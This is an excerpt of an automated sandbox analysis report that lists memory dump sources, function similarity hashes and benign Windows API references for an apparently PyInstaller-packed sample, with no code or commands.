                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2916047017
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1cab4e7206d5b2d72170653677629db325f2367e82257442cd1c2f89d4db29cc
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0251F4B2B1A74385EB608A25D064F3D27A1FB06BA4F564631CA3D072EDDF6CE841E744
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                                                                                                        • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                                                                                        • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c9f26e4828c30fc30c9bd188d4692b5bc6f372b7854fcd48b43ca734b0d55e20
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F41F872B0CB4286E7188F18E854A697765EBA0790F848270EA79C7ADDDF3CD5818B40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: $%!.15g$-
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-875264902
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5d7b4d774d5f0c79a87d46bb01540964a3971d8a75a252aaa30320a2d7525028
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5412862F1978682F710CB2EE050B6A7B90EB467C4F004125EA9D477A9CB3DD405D700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c6d765547d32f4a3751ea5c11716a805936d5c1efa4885baf5a6cf128dc642c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1413F21B0AB8380FF5DAF659470BB83390AF41B84F5805B5DE7D4B7CDDF28A41A8214
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF6BA3A352C,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A7F32
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f29f0fb67ac1866a42dd6160b06a30ee706c458277aba1d7a05b8fdeca8e2c85
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0531C221619AD545EF219B29E8507AE639AEF84BE0F440271EF6DC7BC9EF3CD6418700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3242eb4e7a23a38344cd68c91a2b22a657e0197ac3394b977aafa74767134204
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC21A172B08B5182E7109B59F8847EA73A5FB88780F404136EF8DD7666EE3CD245C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ef953d58a3e27de98cccb82c67664fab58bd63d88ef1e527bfa9560445a74cb
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21D11672B18A8189E721CF79D4402AC77B2FB59798B884276DF5ED7B99DE38D406C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 35c5d2ddfb0390e77b5fc4b97464002024ab7fc143e77e726d05edeed6224623
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1b9db26d39675aac39c907a011138455c13be1779ce8c79068f2721a65db6fc8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35c5d2ddfb0390e77b5fc4b97464002024ab7fc143e77e726d05edeed6224623
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2791DF72F0A74B86EB259A129560A393690FB45BE4F4D5234EEBD4B7E9DF3CE0508300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD07C
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD107
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ec586eb8924886d0c864ad17c5384adf69ef9668bb76eb356cde9310a985e9e8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE91B432F18A5289F7A09F6D94402BD6BA2AB44BC8F9442B5DF0ED7A94DF3CD442C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 139b0b010e53845ffc32afde63b358dd77c2607c0f7643788c5621ac30eed665
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C51D272F04A118BEB18CF6C99556BC27A2AB44369F901375DF1ED2AE5DF39E406C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5ab84bcfd6b32d117b449bbad918289ce3c76e6614392b6939ed3afa7ea1916f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61514922F08A418AFB50DF79D4503BD37A2AB48B98F549675EF4ADB689DF38D4818700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: f156c778602553fb8e6ad486ebff7de94d5ca6f9ee5b8a755dbaf2d72c8b4207
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c9affa16d47de5e0ea703df6936b269d9f60b8099f5297b1b8a7456ec9272ad
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f156c778602553fb8e6ad486ebff7de94d5ca6f9ee5b8a755dbaf2d72c8b4207
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A218C62B0A74283D724AB16B5624BAB3A1FB447C4B085131DFDE4BFAACF2CE051C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7679ec17063924541901481bf07df1987c0fea6410c096e0297fb8c568833bea
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9911C821F1C16682FE549BAEE9852BD5293EF88780F888071DF49C7BA9DD3DD8D58700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
